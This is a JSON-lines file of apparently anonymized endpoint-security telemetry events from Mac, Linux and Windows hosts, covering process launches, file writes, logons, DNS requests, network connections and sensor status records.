-{"event_simpleName":"ELFFileWritten","ContextTimeStamp":"1625677526.828","ConfigStateHash":"1620585913","ContextProcessId":"363122200934575406","Size":"38798952","ContextThreadId":"0","aip":"208.24.116.10","SHA256HashData":"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027","FileIdentifier":"040000010000000000000000000000006793f80200000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ELFFileWrittenMacV1","id":"ffffffff-1111-11eb-985c-02152dd35bc1","ELFSubType":"4","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677527114","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe"} -{"MajorVersion":"4","event_simpleName":"OsVersionInfo","OSVersionFileData":"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a","BootArgs":"BOOT_IMAGE\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\u003dUUID\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\u003dtty0 console\u003dttyS0,115200n8 net.ifnames\u003d0 biosdevname\u003d0 nvme_core.io_timeout\u003d4294967295 rd.emergency\u003dpoweroff rd.shell\u003d0","ConfigStateHash":"3712162471","AgentVersion":"6.19.11611.0","aip":"208.203.151.21","MinorVersion":"14","OSVersionString":"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"OsVersionInfoLinV4","RFMState":"1","id":"ffffffff-1111-11eb-93d4-0624c36f3a79","OSVersionFileName":"/etc/os-release","aid":"ffffffff2d1245c0a32d5efcf9351272","timestamp":"1625677383466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CriticalFileModified","ContextTimeStamp":"1625677439.099","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"364849347227309005","ContextThreadId":"0","aip":"208.216.154.14","FileIdentifier":"04000001000000000000000000000000cdf3100100000000","ConfigBuild":"1007.4.0013701.1","UID":"0","USN":"89566685","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileModifiedMacV2","id":"ffffffff-1111-11eb-9262-0268ab613b49","EffectiveTransmissionClass":"2","aid":"ffffffff761b4a7d9962dd9e7e776044","timestamp":"1625677439398","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/user9.plist/"} -{"event_simpleName":"NeighborListIP6","ConfigStateHash":"3090255842","NeighborList":"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|","aip":"208.230.229.237","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP6MacV1","id":"ffffffff-1111-11eb-ac8a-06b5e1186139","EffectiveTransmissionClass":"3","aid":"ffffffff01c7450180352a7c58a28fb4","timestamp":"1625677489786","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677382.785","UserName":"user3","ConfigStateHash":"1325353086","ContextProcessId":"364952259879648742","Size":"8052","ContextThreadId":"0","aip":"208.182.203.47","SHA256HashData":"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6","FileIdentifier":"04000001000000000000000000000000ef07570000000000","ConfigBuild":"1007.4.0013806.1","event_platform":"Mac","IsOnRemovableDisk":"0","Entitlements":"15","name":"NewScriptWrittenMacV3","id":"ffffffff-1111-11eb-9dc1-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffffcebd42c0890d59b54279d3d3","timestamp":"1625677383057","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh"} -{"event_simpleName":"SystemCapacity","ConfigStateHash":"1620585913","aip":"208.145.211.220","CpuClockSpeed":"2400000000","PhysicalCoreCount":"8","CpuFeaturesMask":"7494065083908067","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LogicalCoreCount":"16","Entitlements":"15","name":"SystemCapacityMacV1","CpuVendor":"0","CpuProcessorName":"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz","id":"ffffffff-1111-11eb-b714-066001392751","CpuSignature":"591597","EffectiveTransmissionClass":"3","aid":"fffffffff2c7432859ff6bbe1a0bd6af","ProcessorPackageCount":"1","MemoryTotal":"17179869184","timestamp":"1625677387216","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"FirmwareAnalysisStatus","ConfigStateHash":"3090255842","FirmwareAnalysisEclControlInterfaceVersion":"0","aip":"208.71.69.91","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","FirmwareAnalysisEclConsumerInterfaceVersion":"0","BootTimeFunctionalityLevel":"255","ReasonOfFunctionalityLevel":"3","CurrentFunctionalityLevel":"2","Entitlements":"15","name":"FirmwareAnalysisStatusMacV2","id":"ffffffff-1111-11eb-ba57-0214a0d89bf7","EffectiveTransmissionClass":"0","aid":"ffffffff0d7b4d839912e55b4755e85b","timestamp":"1625677368429","cid":"ffffffff15754bcfb5f9152ec7ac90ac","PciAttachmentState":"65535"} -{"OutOctets":"0","CreationTimeStamp":"","aip":"208.160.204.13","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"utun2","InDiscards":"0","InterfaceIndex":"17","event_platform":"Mac","InterfaceType":"1","id":"ffffffff-1111-11eb-a272-0294ad12fbe7","PhysicalAddressLength":"0","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677504544","LocalAddressIP4":"208.27.234.231","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"3090255842","PhysicalAddress":"","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressIP4MacV1","aid":"ffffffff557f4b99a0afdea9ce8cd6fa","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"CommandLine":"uname -a","ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","Entitlements":"15","GID":"0","ImageFileName":"/bin/uname","MD5HashData":"894356eb59e279696c304f07091b7fde","NDRoot":"321385814512398584","ParentProcessId":"321385814512398584","ProcessEndTime":"1604855099.126","ProcessGroupId":"0","ProcessStartTime":"1604855099.126","RGID":"0","RUID":"0","RawProcessId":"51342","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa","SVGID":"0","SVUID":"0","SessionProcessId":"314116638974342642","SourceProcessId":"321385814512398584","SourceThreadId":"0","TargetProcessId":"321385814512398605","UID":"0","aid":"ffffffff70d140ca9ba97f0dddd14137","aip":"208.216.134.209","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-ac87-06decddc17a1","name":"ProcessRollup2LinV5","timestamp":"1604855099681"} -{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"317713210176499254","ContextThreadId":"0","ContextTimeStamp":"1604855096.730","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"28987","SHA256HashData":"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"317713210176499254","aid":"ffffffff75fc48f15cfe5f095e605c4c","aip":"208.3.106.158","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-809e-02fff4e55a49","name":"EndOfProcessMacV14","timestamp":"1604855099646"} -{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"38188","ConHostProcessId":"3099352216141","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextData":"","ContextProcessId":"3100508103359","ContextThreadId":"93436292950223","ContextTimeStamp":"1604855097.926","CreateProcessCount":"0","CycleTime":"2937514388","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"1","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"2","GenericFileWrittenCount":"0","ImageSubsystem":"3","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"7500000","MaxThreadCount":"4","ModuleLoadCount":"38","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"3099350649383","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855096.463","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"33016","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"3100508103359","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-5-18","UserTime":"6406250","aid":"ffffffffb5db4b2e7ec89aba537adcc2","aip":"208.9.60.157","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"EndOfProcessV15","timestamp":"1604855099935"} -{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","ContextProcessId":"311775981885093125","ContextThreadId":"0","ContextTimeStamp":"1604855101.341","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"10507","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"311775981885093125","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"208.14.207.30","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"EndOfProcessMacV12","timestamp":"1604855100139"} -{"AuthenticationId":"999","CommandLine":"D:\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe --ps2","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume2\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe","ImageSubsystem":"3","IntegrityLevel":"16384","MD5HashData":"571391f723a439e985a2064337e2802a","ParentAuthenticationId":"999","ParentBaseFileName":"splunkd.exe","ParentProcessId":"17346335177","ProcessCreateFlags":"67634688","ProcessEndTime":"","ProcessParameterFlags":"24577","ProcessStartTime":"1604855099.406","ProcessSxsFlags":"64","RawProcessId":"6116","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720","SessionId":"0","SourceProcessId":"17346335177","SourceThreadId":"107650023406","Tags":"27, 151, 12094627905582, 12094627906234","TargetProcessId":"583707537390","TokenType":"1","UserSid":"S-1-5-18","WindowFlags":"384","aid":"ffffffff3a5a424fa02450da53619745","aip":"208.216.142.127","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-a09e-06f79d630255","name":"ProcessRollup2V17","timestamp":"1604855100030"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2784638081","ContextProcessId":"259090530891","ContextThreadId":"16409623709004","ContextTimeStamp":"1604855095.961","DnsRequestCount":"1","DomainName":"comp1.dom2","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff4f1444bab96568879cb43556","aip":"208.216.144.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DnsRequest","id":"ffffffff-1111-11eb-8077-0606f7dcf2ed","name":"DnsRequestV3","timestamp":"1604855099913"} -{"ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","ContextProcessId":"321385820045701199","ContextThreadId":"0","ContextTimeStamp":"1604855101.645","Entitlements":"15","GID":"0","TargetFileName":"/etc/shadow","UID":"0","UnixMode":"32768","aid":"ffffffff32ba43a483e76c6f0a4aa26f","aip":"208.216.150.197","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"CriticalFileAccessed","id":"ffffffff-1111-11eb-b70d-027f9ced2001","name":"CriticalFileAccessedLinV1","timestamp":"1604855102247"} -{"CommandLine":"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","Entitlements":"15","GID":"0","ImageFileName":"/usr/bin/plutil","MD5HashData":"d51cef1b288e2032aee9805deff04bfd","MachOSubType":"1","ParentProcessId":"311774817965726568","ProcessEndTime":"","ProcessGroupId":"311774817965726568","ProcessStartTime":"1604855111.240","RGID":"0","RUID":"0","RawProcessId":"10692","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SVGID":"0","SVUID":"0","SourceProcessId":"311776004953765502","SourceThreadId":"0","Tags":"27, 12094627905582, 12094627906234","TargetProcessId":"311776004953765502","UID":"0","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"208.14.207.30","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"ProcessRollup2MacV3","timestamp":"1604855109180"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3899738370","ContextProcessId":"1546527409909","ContextThreadId":"4711690090889","ContextTimeStamp":"1604855114.133","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00","FileObject":"18446655033844205120","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"88080484","ShareAccess":"1","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Windows\\Temp\\__PSScriptPolicyTest_dvkjnbka.apn.ps1","aid":"ffffffff8f1e4b77b4dae5debaa1c8bc","aip":"208.216.150.210","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewScriptWritten","id":"ffffffff-1111-11eb-80b5-06e11a66e03d","name":"NewScriptWrittenV7","timestamp":"1604855114427"} -{"ConfigBuild":"1007.4.0012205.1","ConfigStateHash":"1306766522","ConnectionDirection":"1","ConnectionFlags":"0","ContextProcessId":"321275232072440993","ContextTimeStamp":"1604855116.421","Entitlements":"15","InContext":"0","LocalAddressIP4":"0.0.0.0","LocalPort":"0","Protocol":"6","RemoteAddressIP4":"208.72.48.107","RemotePort":"443","aid":"ffffffffd4094240a6b1d12aaf304f4f","aip":"208.216.150.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-aca9-02683aed2a0d","name":"NetworkConnectIP4MacV5","timestamp":"1604855116502"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2602391615","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"223442259384","ContextTimeStamp":"1604855116.849","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"208.22.254.101","LocalPort":"53961","Protocol":"6","RemoteAddressIP4":"208.91.140.216","RemotePort":"443","aid":"fffffffff000426eb99afaa2ccdcbc17","aip":"208.216.150.194","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-b0eb-06be7616c211","name":"NetworkConnectIP4V5","timestamp":"1604855116942"} -{"AuthenticationId":"6580764513","AuthenticationPackage":"Negotiate","ClientComputerName":"-","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"816054990879","ContextThreadId":"52913017705957","ContextTimeStamp":"1604855091.781","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"NT AUTHORITY","LogonServer":"","LogonTime":"1604855091.781","LogonType":"9","PasswordLastSet":"","RemoteAccount":"1","UserFlags":"0","UserIsAdmin":"0","UserLogonFlags":"12","UserName":"SYSTEM","UserPrincipal":"user4@dom2","UserSid":"S-1-5-18","aid":"ffffffff8d2e4b4f9b21b40633a8d579","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogon","id":"ffffffff-1111-11eb-a8cf-0649c95cfa1d","name":"UserLogonV8","timestamp":"1604855121077"} -{"AuthenticationId":"2007206396","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"4415814628770","ContextThreadId":"41392001729898","ContextTimeStamp":"1604855120.785","DiskParentDeviceInstanceId":"PCI\\VEN_1000\u0026DEV_0054\u0026SUBSYS_197615AD\u0026REV_01\\4\u00261f16fef7\u00260\u002600A8","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c","FileObject":"18446708893089967904","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","IsTransactedFile":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","SHA256HashData":"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182","Size":"6144","TargetFileName":"\\Device\\HarddiskVolume2\\Users\\user10\\AppData\\Local\\Temp\\ec1ijefl.dll","TokenType":"1","aid":"ffffffff2c47454cba360bc404a607bb","aip":"208.216.144.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PeFileWritten","id":"ffffffff-1111-11eb-b091-06f6cca0a049","name":"PeFileWrittenV14","timestamp":"1604855121109"} -{"AuthenticationId":"317005428","AuthenticationPackage":"Negotiate","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3950066843","EffectiveTransmissionClass":"2","Entitlements":"15","LogoffTime":"1604855132.756","LogonDomain":"dom1","LogonServer":"srv2","LogonTime":"1604855131.666","LogonType":"7","PasswordLastSet":"1598119332.510","RemoteAccount":"1","UserFlags":"32","UserIsAdmin":"0","UserLogoffType":"3","UserLogonFlags":"0","UserName":"user4","UserPrincipal":"user.name@dom2.com","UserSid":"S-1-5-21-606747145-1364589140-725345543-28636","aid":"ffffffffe0104823bd3de859d5bc8bc7","aip":"208.216.134.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogoff","id":"ffffffff-1111-11eb-8913-0287fd11c79b","name":"UserLogoffV3","timestamp":"1604855134461"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"537307300","ContextProcessId":"635780922149","ContextThreadId":"9479299143023","ContextTimeStamp":"1604855025.966","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"0e02a8c7ed9d244887cef0409af0e6190030000000001100","FileObject":"18446695174291796544","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"83886176","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Program Files\\Snow Software\\Inventory\\Agent\\cloudmeteringhost.exe","aid":"ffffffff425942f58382dbb11350eeda","aip":"208.216.150.192","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableWritten","id":"ffffffff-1111-11eb-93cb-067deb43537b","name":"NewExecutableWrittenV1","timestamp":"1604855149643"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"50714198593318","ContextThreadId":"194302491825207","ContextTimeStamp":"1604855150.066","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"59491","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffa51b4acf9dbc1fc273e6145c","aip":"208.222.216.124","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"NetworkListenIP4V5","timestamp":"1604855150545"} -{"ClientComputerName":"com1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"7073822473144","ContextThreadId":"48689911139327","ContextTimeStamp":"1604855152.993","EffectiveTransmissionClass":"2","Entitlements":"15","EtwRawProcessId":"744","EtwRawThreadId":"5304","LogonDomain":"BROADCAST","LogonType":"3","RemoteAddressIP4":"208.80.28.100","Status":"3221225581","SubStatus":"3221225578","UserName":"user5","aid":"ffffffffd8844a59acce5e1f4ad01888","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed2","id":"ffffffff-1111-11eb-a8aa-067029dffccb","name":"UserLogonFailed2V2","timestamp":"1604855154274"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextProcessId":"1838383212125","ContextThreadId":"27242382481217","ContextTimeStamp":"1604855151.534","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff","FileObject":"18446636884348143072","IrpFlags":"1028","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Program Files\\WindowsApps\\Deleted\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\clrcompression.dll","aid":"ffffffff4a0946365161093453e596d4","aip":"208.216.150.195","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ExecutableDeleted","id":"ffffffff-1111-11eb-b23b-064dea059649","name":"ExecutableDeletedV3","timestamp":"1604855154670"} -{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009202.1","ConfigStateHash":"230795414","ContextProcessId":"318137549555284836","ContextThreadId":"0","ContextTimeStamp":"1604855135.209","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"20195","SHA256HashData":"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"318137549555284836","aid":"ffffffffcfe84e8c6a52c4001bd83761","aip":"208.173.124.176","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-ae31-065d76bec0c3","name":"EndOfProcessMacV11","timestamp":"1604855160047"} -{"ApiReturnValue":"1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"683078218537","ContextTimeStamp":"1604855171.731","EffectiveTransmissionClass":"3","Entitlements":"15","EtwRawProcessId":"19400","EtwRawThreadId":"9384","aid":"ffffffff80984ea8b49d9a53f590c566","aip":"208.24.76.36","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RegisterRawInputDevicesEtw","id":"ffffffff-1111-11eb-a570-0685ba2a382f","name":"RegisterRawInputDevicesEtwV1","timestamp":"1604855173077"} -{"CompletionEventId":"Event_ChannelDataDownloadCompleteV1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","DownloadPath":"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys","DownloadPort":"443","DownloadServer":"lfodown01-b.cloudsink.net","EffectiveTransmissionClass":"0","Entitlements":"15","TargetFileName":"C-00000013-00000000-00000408.sys","aid":"ffffffffffc94c645268f64fc900213f","aip":"208.64.212.186","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"LFODownloadConfirmation","id":"ffffffff-1111-11eb-8ab5-0643392fc75d","name":"LFODownloadConfirmationV1","timestamp":"1604855174018"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"2071361595421","ContextThreadId":"41650430047375","ContextTimeStamp":"1604855146.590","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","FileObject":"18446622606546437424","IrpFlags":"395312","MajorFunction":"6","MinorFunction":"0","NewFileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","OperationFlags":"0","SourceFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\temp\\EKA0UARWWK\\Microsoft.WSMan.Management.ni.dll","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.We0722664#\\c2579d00f9849413b8b7948dd00ac863\\Microsoft.WSMan.Management.ni.dll","aid":"ffffffff280b41b956a91e816bd9b9b0","aip":"208.105.150.175","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8162-0663305b686f","name":"NewExecutableRenamedV6","timestamp":"1604855177513"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"402097454","ContextProcessId":"66601077523","ContextThreadId":"2500785639062","ContextTimeStamp":"1604855165.213","DesiredAccess":"1048577","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700","FileObject":"18446641334185168032","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"35668001","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\CbsTemp\\30848497_1904507751\\FodWU","aid":"ffffffff2c9f4066b0b5f2f00265503c","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DirectoryCreate","id":"ffffffff-1111-11eb-9411-06b7c99be087","name":"DirectoryCreateV1","timestamp":"1604855180332"} -{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextTimeStamp":"1604855196.468","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"949196415400","RpcClientThreadId":"44209361549673","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"wlidsvc","TargetProcessId":"955370934902","TokenType":"1","UserName":"user6","aid":"fffffffffcc4413057adc260e99b0774","aip":"208.9.106.189","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ServiceStarted","id":"ffffffff-1111-11eb-9c98-02c501fe7d81","name":"ServiceStartedV2","timestamp":"1604855196635"} 